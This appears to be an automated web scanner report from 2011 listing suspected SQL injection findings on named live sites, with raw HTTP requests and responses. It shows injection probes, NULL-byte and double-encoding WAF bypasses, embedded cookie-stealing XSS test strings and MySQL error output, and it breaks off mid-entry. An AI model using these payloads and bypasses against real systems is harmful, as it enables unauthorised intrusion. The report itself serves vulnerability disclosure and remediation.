The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&ref=http%3A//burp/show/1&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false%00'&history=2&cb=428&loc=205,1872&output=simplejs&callback=ch_ad_render_search HTTP/1.1 Host: mm.chitika.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:01:49 GMT Server: Apache P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _cc=G/SkJTIFoxB5zyrGvNooXe99hdD4N3Y8+hAWrbEPZjNgAYyxYDc25rnr3Ff/Paa9/v3eI79FPXJcaLozQcxdpm5MM6R4QaC6sE5VMlIyysjvzjIeQkglG+XihWzhr/fZli1zObbtcS6mSLQnjk03OgIAQN4xIi4OAGyaxsr2pmtcoIEdVFMLG1qU2DWdhwqZmSygSSW8QGDuC4HGJ0b/Z2L9NCigN44ppkm4HdKHuVwsMzOoS0f2BaGqdksKsUKux/kFVZeyXFieCY/ZQRCiGwnaR6ImPRDQS/lIoW6dtX5Qz5Rb81Og0A9uKOao57Q3ndpPaWNj96D/Lo5ssIaeclFQKZRjkZp2ArR9KuWy9vUbLvuxpGH6lkiTumvPM+RUBP96mw5RFlxP8EylO52TSis8TgwolY5Gg3BfKaaG0W/FJaYc.s/MiCuIckIOrG8DkvWNfiA.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 23:01:49 GMT Vary: Accept-Encoding Connection: close Content-Type: application/x-javascript; charset=utf-8 Content-Length: 19194
var ch_mmhtml = {"mobilehtml":"","pixelhtml":"","snurl":"http://searchnet.chitika.net/audience?cc=US&domain=homeappliance.manualsonline.com&ip=173.193.214.243&murl=home-warranty.firstam.com,pc-test.co ...[SNIP]... O15H5daRJPBlH%2FSbzIHiQCsWSZWkQSTw3AHBTGHo9g6qLtBS5%2BaQXf3HvBBTCB%2ByzTytycqPwU82LaNRsvca1NL910pVw7nc3TO1IgGGuIAO2uYw&template=v1-450xauto\">Your Free recommended download to fix Windows Vista and XP errors!<!--overture--> ...[SNIP]...
Request 2
GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&ref=http%3A//burp/show/1&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false%00''&history=2&cb=428&loc=205,1872&output=simplejs&callback=ch_ad_render_search HTTP/1.1 Host: mm.chitika.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:01:55 GMT Server: Apache P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _cc=G/SkJYTl4xB5DzWnjJsxKS7Ikiy5zkR+OaoC5I4yrnSj0IzYFdv/5xkL34IVVlNI21A6Tll5JhicLyDKsXHxiXt4czGm74ULKBQKIhvH/MR7vSf4QYfI2D5z9rB2Z3FWtfyCSbFkg+/5YfV1UiWFk065BW3/iEtfbUHQgfa9AKUmjhlaZ2g+R9ESfr/p556qQovpllZTUTJc0F++uYsY8Qk74sYaMk4USrbAjv+COiS68qoNWkMd/guT/ktJJLZK/zrOCBhqAsXvLRkFzPadj/K2xMcHN4dWHFZRV3BZrZ7bKC2RKEgmZiD+RwRBcENkbrDf3CJdWjceNmKAHA1/k22otNyfLQCaXrzBtVKb/Nbf1GV3oX1jQecjjMYUMcgxTopHYlTEQGKtzjJDEuSJES3gfiMRKJ/PD9kTDzerHB1s+qOnBw==.cHhmyQbUSBnRfZHEv3/FmA.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 23:01:55 GMT Vary: Accept-Encoding Connection: close Content-Type: application/x-javascript; charset=utf-8 Content-Length: 19123
var ch_mmhtml = {"mobilehtml":"","pixelhtml":"","snurl":"http://searchnet.chitika.net/audience?cc=US&domain=homeappliance.manualsonline.com&ip=173.193.214.243&murl=open-with.pc-test.com,sparxsystems.c ...[SNIP]...
The output parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the output parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e/product_problem&ref=http%3A//burp/show/2&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false&history=2&cb=159&loc=205,1844&output=simplejs%00'&callback=ch_ad_render_search HTTP/1.1 Host: mm.chitika.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%2527%253balert%25281%2529%252f%252f35f276845e/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: _cc=G/SkJTIFoxB5zyrGvNoopWH98lzIGX09Lqf5eXifPARQKIeBMDE2hXiO2v2mk4qq+VP5P+m5J4eRJC5zWa+7Jf/jc6jkVmF/MbVWYaETxPD821XiL9JnE93XkPahPfrLgcfAbrpHrHNZJnEeObU3OtCTVkfYYH7KACiAKZU6LmYWAtjWSyuwX+GHPstuHx9zwtQHlMeOjOOZqdwl722uq28wErLf/s1odnEP3DQeHuP1taSO/8VINxZmUH3OCHKjzoEA3Ep2hvSi4fTUQ9xQg5HBigwFw6FcG4XjG/ZwAf++TM2bd6D6MDuMeCmjszjwKZD/DVxhbPa1zjGTdrpztnAx7H5aYU7Rqim51ZoqsIAq7yljuMQoFzxW0QdFZuKMR6dZIfdTULQZElAm9UvyESXU0bZ2j55Oz02Ty6P8x00eoqYu.JlGLkqSjkssYk0faKwa/ow.4
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:04:49 GMT Server: Apache P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _cc=G/Sk5qAFuhB59X9RSLW7ckHfTilfUr8ib+dgOlCrfN8tBICvndkUjF0Z+nHc1Lu4MJAEmuf7fLy0i4/wwCbQ43hc1E5Er3lpKWuO/mo+YDpjuTx8UIUKda73Ece3P1hlb0MyAv+2UILn776mpHuBjjtlJIkhqRnLQogXCoP6wqyg/QYisThsxwzalEcKONAJg6KntPTEiekOflooJTJsgje4dXFcK4GtVRgajUVRJhm6zbs8vkT3bFy7fNreAZbQsODCkNqyvvHTc94Y+NA959gf/JzitgbxCcNwVNfxNri8JxaY7PCzU5dyij/M3kpdjVBtH7+04yzwdOpkFzAIbk7QAbXG1n0fEjPpKQsDR6NlY3bvEorfyuWFdrnGpIZMd0Mxt80tQUktKfdRUkiIEoYWSGPR/VnmmZkRiG0ClYYOSGCk82bO8hxXVKcQqKWQpoX87MkSKH1vk6DJtibEwzhPf3oN3buTIaLqG8mMkFaxQi4eHZC8UhWRY40re9E=.DQ6LMm6rS5GiZpB+XsnH6g.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 23:04:49 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21034
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi ...[SNIP]... PVs1K%2FWWKWj4SRWLTkFgHujJpdV3XGBUvGGVmufLsEHrxN1BF2EdMXYmwkjrUFCb6pj6q7cCdZ4w2lI6oh8%2B3wzEBnV6r0jlsUnfMFgXF14JaLfo%3D&template=v1-450xauto">Your Free recommended download to fix Windows Vista and XP errors!<!--overture--> ...[SNIP]...
Request 2
GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e/product_problem&ref=http%3A//burp/show/2&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false&history=2&cb=159&loc=205,1844&output=simplejs%00''&callback=ch_ad_render_search HTTP/1.1 Host: mm.chitika.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%2527%253balert%25281%2529%252f%252f35f276845e/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: _cc=G/SkJTIFoxB5zyrGvNoopWH98lzIGX09Lqf5eXifPARQKIeBMDE2hXiO2v2mk4qq+VP5P+m5J4eRJC5zWa+7Jf/jc6jkVmF/MbVWYaETxPD821XiL9JnE93XkPahPfrLgcfAbrpHrHNZJnEeObU3OtCTVkfYYH7KACiAKZU6LmYWAtjWSyuwX+GHPstuHx9zwtQHlMeOjOOZqdwl722uq28wErLf/s1odnEP3DQeHuP1taSO/8VINxZmUH3OCHKjzoEA3Ep2hvSi4fTUQ9xQg5HBigwFw6FcG4XjG/ZwAf++TM2bd6D6MDuMeCmjszjwKZD/DVxhbPa1zjGTdrpztnAx7H5aYU7Rqim51ZoqsIAq7yljuMQoFzxW0QdFZuKMR6dZIfdTULQZElAm9UvyESXU0bZ2j55Oz02Ty6P8x00eoqYu.JlGLkqSjkssYk0faKwa/ow.4
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:04:49 GMT Server: Apache P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _cc=G/Sk5qAFuhB59X9RSLW7ckHfTilfUr8ib+dgOlCrfN8tBICvndkUjF0Z+nHc1Lu4MJAEmuf7fLy0i4/wwCbQ43hc1E5Er3lpKWuO/mo+YDpjuTx8UIUKda73Ece3P1hlb0MyAv+2UILn776mpHuBjjtlJIkhqRnLQogXCoP6wqyg/QYisThsxwzalEcKONAJg6KntPTEiekOflooJTJsgje4dXFcK4GtVRgajUVRJhm6zbs8vkT3bFy7fNreAZbQsODCkNqyvvHTc94Y+NA959gf/JzitgbxCcNwVNfxNri8JxaY7PCzU5dyij/M3kpdjVBtH7+04yzwdOpkFzAIbk7QAbXG1n0fEjPpKQsDR6NlY3bvEorfyuWFdrnGpIZMd0Mxt80tQUktKfdRUkiIEoYWSGPR/VnmmZkRiG0ClYYOSGCk82bO8hxXVKcQqKWQpoX87MkSKH1vk6DJtibEwzhPf3oN3buTIaLqG8mMkFaxQi4eHZC8UhWRY40re9E=.DQ6LMm6rS5GiZpB+XsnH6g.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 23:04:49 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21738
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi ...[SNIP]...
The flash parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the flash parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /gampad/ads?correlator=1296999633346&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&a2ids=BI04A&cids=Urcrdg&pstok=VbbiuyNOfJsKDgoKCODpSBDY2_LWFBAA&client=ca-pub-1100161805080516&slotname=Tipd_300x250&page_slots=tipd-Others_sidebar_300x250%2CTipd_300x250&cookie=ID%3Dd7dc9664002f3c4e%3AT%3D1296999550%3AS%3DALNI_MZNjYniXih7H0A04asfHG6rtAHkcQ&ga_vid=1926595520.1296999588&ga_sid=1296999588&ga_hid=1013703234&ga_fc=true&url=http%3A%2F%2Ftipd.com%2Fregister&ref=http%3A%2F%2Ftipd.com%2F%3F6785a%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eea5c679a90c%3D1&lmt=1297021234&dt=1296999634578&cc=81&biw=1001&bih=1015&ifi=2&adk=3099318589&u_tz=-360&u_his=3&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.1.103'%20and%201%3d1--%20 HTTP/1.1 Host: pubads.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://tipd.com/register Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response 1
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sun, 06 Feb 2011 13:52:27 GMT Server: gfp-be Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 2974
GA_googleSetAdContentsBySlotForSync({"Tipd_300x250":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\ ...[SNIP]... = c + t + r; } else {a.href += \"\x26clkt=\" + t;}}return true;}function cs(){window.status='';} function jcc(a) {pha=document.getElementById(a); nc=pha.href.indexOf('\x26jca='); if(nc\x3e=1) return; jca=(9507)-(226)-(558); if (a=='aw0') {jca+=(-2656);} else {jca=0;} phb=pha.href+'\x26jca='+jca; pha.href=phb;} function st(id) {var a = document.getElementById(id);if (a) {a.myt = (new Date()).getTime();}return true;}function ha(a){ su(a); jcc(a); }function ca(a) { su(a); jcc(a); top.location.href=document.getElementById(a).href;}function ga(o,e) {if (document.getElementById) {a=o.id.substring(1);p=\"\";r=\"\";g=e.target;if (g) {t=g.id;f=g.parentNode;if (f) {p=f.id;h=f.parentNode;if (h)r=h.id;}} else {h=e.srcElement;f=h.parentNode;if (f)p=f.id;t=h.id;}if (t==a||p==a||r==a)return true;su(a); jcc(a); top.location.href=document.getElementById(a).href;}}\x3c/script\x3e\x3ca id=\"aw0\" target=\"_top\" href=\"http://googleads.g.doubleclick.net/aclk?sa=l\x26ai=BTHHnm6dOTbqFD4yGlgfFoMSFCe3px-sBAAAAEAEgvca9DjgAUJeFyLD______wFYlYzK1xVgyYajh9SjgBCyAQh0aXBkLmNvbboBCjMwMHgyNTBfYXPIAQLaARhodHRwOi8vdGlwZC5jb20vcmVnaXN0ZXLgAQLAAgLgAgDqAgxUaXBkXzMwMHgyNTD4AvjRHoADAZAD6AKYA_ABqAMByAMV4AQB\x26num=0\x26sig=AGiWqtzjS3LqvtxHXPNaIwJ9eTNc2wsz4Q\x26client=ca-pub-1100161805080516\x26adurl=http://rydex-sgi.com/equalweight/\" onFocus=\"ss('','aw0')\" onMouseDown=\"st('aw0')\" onMouseOver=\"return ss('','aw0')\" onMouseOut=\"cs()\" onClick=\"ha('aw0')\"\x3e\x3cimg src=\"http://pagead2.googlesyndication.com/pagead/imgad?id=CKGT9_bGgJ-TexCsAhj6ATIINJM88i6QLlA\" border=\"0\" width=\"300\" height=\"250\"\x3e\x3c/a\x3e\x3c/body\x3e\x3c/html\x3e","_snippet_":false,"_height_":250,"_width_":300,"_empty_":false,"_is_afc_":false,"_is_psa_":false,"_is_3pas_":false,"_cids_":["VryhhU"],"_a2ids_":["CAmDQ"],"_pstok_":"moYbtblgPScKDgoKCODpSBDY2_LWFBAACg8KCwiNzIABEJWMytcVEAA"}});
Request 2
GET /gampad/ads?correlator=1296999633346&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&a2ids=BI04A&cids=Urcrdg&pstok=VbbiuyNOfJsKDgoKCODpSBDY2_LWFBAA&client=ca-pub-1100161805080516&slotname=Tipd_300x250&page_slots=tipd-Others_sidebar_300x250%2CTipd_300x250&cookie=ID%3Dd7dc9664002f3c4e%3AT%3D1296999550%3AS%3DALNI_MZNjYniXih7H0A04asfHG6rtAHkcQ&ga_vid=1926595520.1296999588&ga_sid=1296999588&ga_hid=1013703234&ga_fc=true&url=http%3A%2F%2Ftipd.com%2Fregister&ref=http%3A%2F%2Ftipd.com%2F%3F6785a%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eea5c679a90c%3D1&lmt=1297021234&dt=1296999634578&cc=81&biw=1001&bih=1015&ifi=2&adk=3099318589&u_tz=-360&u_his=3&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.1.103'%20and%201%3d2--%20 HTTP/1.1 Host: pubads.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://tipd.com/register Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response 2
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sun, 06 Feb 2011 13:52:28 GMT Server: gfp-be Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 3045
GA_googleSetAdContentsBySlotForSync({"Tipd_300x250":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\ ...[SNIP]... = c + t + r; } else {a.href += \"\x26clkt=\" + t;}}return true;}function cs(){window.status='';} function jcc(a) {pha=document.getElementById(a); nc=pha.href.indexOf('\x26jca='); if(nc\x3e=1) return; sv=String.fromCharCode(55,57,49,54,57,53,56,57,53); sv=sv.slice(1,5); jca=(-4875)+parseInt(sv); if (a=='aw0') {jca+=(2350);} else {jca=0;} phb=pha.href+'\x26jca='+jca; pha.href=phb;} function st(id) {var a = document.getElementById(id);if (a) {a.myt = (new Date()).getTime();}return true;}function ha(a){ su(a); jcc(a); }function ca(a) { su(a); jcc(a); top.location.href=document.getElementById(a).href;}function ga(o,e) {if (document.getElementById) {a=o.id.substring(1);p=\"\";r=\"\";g=e.target;if (g) {t=g.id;f=g.parentNode;if (f) {p=f.id;h=f.parentNode;if (h)r=h.id;}} else {h=e.srcElement;f=h.parentNode;if (f)p=f.id;t=h.id;}if (t==a||p==a||r==a)return true;su(a); jcc(a); top.location.href=document.getElementById(a).href;}}\x3c/script\x3e\x3ca id=\"aw0\" target=\"_top\" href=\"http://googleads.g.doubleclick.net/aclk?sa=l\x26ai=BdkO2nKdOTaGyEur7lQfYuJSaA-3px-sBAAAAEAEgvca9DjgAUJeFyLD______wFYlYzK1xVgyYajh9SjgBCyAQh0aXBkLmNvbboBCjMwMHgyNTBfYXPIAQLaARhodHRwOi8vdGlwZC5jb20vcmVnaXN0ZXLgAQLAAgLgAgDqAgxUaXBkXzMwMHgyNTD4AvjRHoADAZAD6AKYA_ABqAMByAMV4AQB\x26num=0\x26sig=AGiWqtwm2_nbgUzu0V6hHIJj95ks7G-P4A\x26client=ca-pub-1100161805080516\x26adurl=http://rydex-sgi.com/equalweight/\" onFocus=\"ss('','aw0')\" onMouseDown=\"st('aw0')\" onMouseOver=\"return ss('','aw0')\" onMouseOut=\"cs()\" onClick=\"ha('aw0')\"\x3e\x3cimg src=\"http://pagead2.googlesyndication.com/pagead/imgad?id=CKGT9_bGgJ-TexCsAhj6ATIINJM88i6QLlA\" border=\"0\" width=\"300\" height=\"250\"\x3e\x3c/a\x3e\x3c/body\x3e\x3c/html\x3e","_snippet_":false,"_height_":250,"_width_":300,"_empty_":false,"_is_afc_":false,"_is_psa_":false,"_is_3pas_":false,"_cids_":["VryhhU"],"_a2ids_":["CAmDQ"],"_pstok_":"moYbtblgPScKDgoKCODpSBDY2_LWFBAACg8KCwiNzIABEJWMytcVEAA"}});
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /FXM/iview/211419853/direct;wi.125;hi.125/01?click= HTTP/1.1 Host: redacted Proxy-Connection: keep-alive Referer: http://www.forex-direkt.de/?b35b2--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7a27f6b27d=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13%2527 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F
Response 1
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6126 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 06 Feb 2011 16:31:57 GMT
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /aboutus.htm' HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:47 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 209
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''aboutus.htm'') ORDER BY old_url DESC LIMIT 1' at line 3
Request 2
GET /aboutus.htm'' HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:47 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 5388
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equi ...[SNIP]...
1.11. http://www.baysideeyes.com.au/aboutus.htm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.baysideeyes.com.au
Path:
/aboutus.htm
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /aboutus.htm?1'=1 HTTP/1.1 Host: www.baysideeyes.com.au Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:34 GMT Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 196
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') ORDER BY old_url DESC LIMIT 1' at line 3
Request 2
